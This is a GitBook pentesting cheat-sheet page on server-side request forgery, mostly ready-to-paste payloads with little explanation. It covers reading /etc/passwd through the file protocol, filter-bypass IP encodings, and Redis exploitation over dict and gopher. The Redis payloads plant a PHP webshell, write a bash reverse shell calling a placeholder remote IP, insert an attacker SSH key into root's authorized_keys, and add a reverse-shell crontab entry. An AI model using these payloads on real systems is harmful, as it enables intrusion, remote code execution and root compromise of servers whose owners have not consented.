Pentesting
  • API Pentesting
  • Pivoting techniques
  • Aquatone
  • NOSQL injections
  • Basic LDAP Injection
  • Basic authentication bypass
  • SERVER SIDE REQUEST FORGERY (SSRF)
  • SQL injections
  • SSTI
  • Easy - No Protections
  • GENERAL INFORMATION
  • XML External Entity (XXE) Injection Payloads
  • Post exploitation techniques
  • Hashcat Cheatsheet
  • John The Ripper Cheatsheet
  • Cracking files
  • Wordlists & co.
  • WinRM (Windows Remote Management) Pentesting
  • API windows
  • Command find priv /esc
  • Crawl/Fuzz
  • HTTP Request Smuggling
  • Api keys
  • Pivoting, Tunneling, and Port Forwarding
  • Shells & Payloads
  • API Recon
  • API Token Attacks
Powered by GitBook
On this page
  • It is possible to prove the vulnerability by reading local files
  • Using the file protocol
  • Then you can enumerate local services that are listening
  • Depending on the response
  • It is also possible to use others protocols like gopher and dict
  • They don't send HTTP headers and can avoid misinterpretation
  • Filter bypass
  • Redis is a database system that stores everything in RAM
  • Getting a webshell
  • Getting a reverse shell
  • Priv. Esc. using SSH key
  • You can use dict protocol and crontab
  • - You set the working directory
  • - Update the redis database location
  • - Listening
  • - Write a reverse shell payload
  • - Save it
  • You can also use the gopher protocol (replace IP and port)

SERVER SIDE REQUEST FORGERY (SSRF)

https://vinc.top/2016/11/24/server-side-request-forgery https://github.com/allanlw/svg-cheatsheet

PoC and enumeration

It is possible to prove the vulnerability by reading local files

Using the file protocol

url=file:///etc/passwd

Then you can enumerate local services that are listening

Depending on the response

http://localhost:

It is also possible to use others protocols like gopher and dict

They don't send HTTP headers and can avoid misinterpretation

gopher://127.0.0.1:6379/test

Filter bypass

http://127.1 instead of http://127.0.0.1 http://0 instead of http://localhost http://0xC0A80001 or http://3232235521 => 192.168.0.1 192.168.516 => 192.168.2.4

Redis Exploitation

Redis is a database system that stores everything in RAM

Getting a webshell

url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>" url=dict://127.0.0.1:6379/SAVE

Getting a reverse shell

gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22 gopher://127.0.0.1:6379/_save nc -lvp http://site.org/reverse.php

Priv. Esc. using SSH key

ssh-keygen url=dict://127.0.0.1:6379/SET%20mykey%20"\n\nCLE_PUB_RSA_ICI\n\n" url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/root/.ssh url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20authorized_keys url=dict://127.0.0.1:6379/SAVE ssh -i id_rsa root@host.org

You can use dict protocol and crontab

- You set the working directory

- Update the redis database location

- Listening

- Write a reverse shell payload

- Save it

dict ://127.0.0.1:6379/config set dir /var/spool/cron/ dict ://127.0.0.1:6379/config set dbfilename root nc -lvp dict ://127.0.0.1:6379/set -.- "\n\n\n* * * * * bash -i >\x26 /dev/tcp/"ip"/"port" 0>\x261\n\n\n" dict ://127.0.0.1:6379/save

You can also use the gopher protocol (replace IP and port)

url=gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252462%250D%250A%250A%250A%252A/

PreviousBasic authentication bypassNextSQL injections

Last updated 1 year ago

Page cover image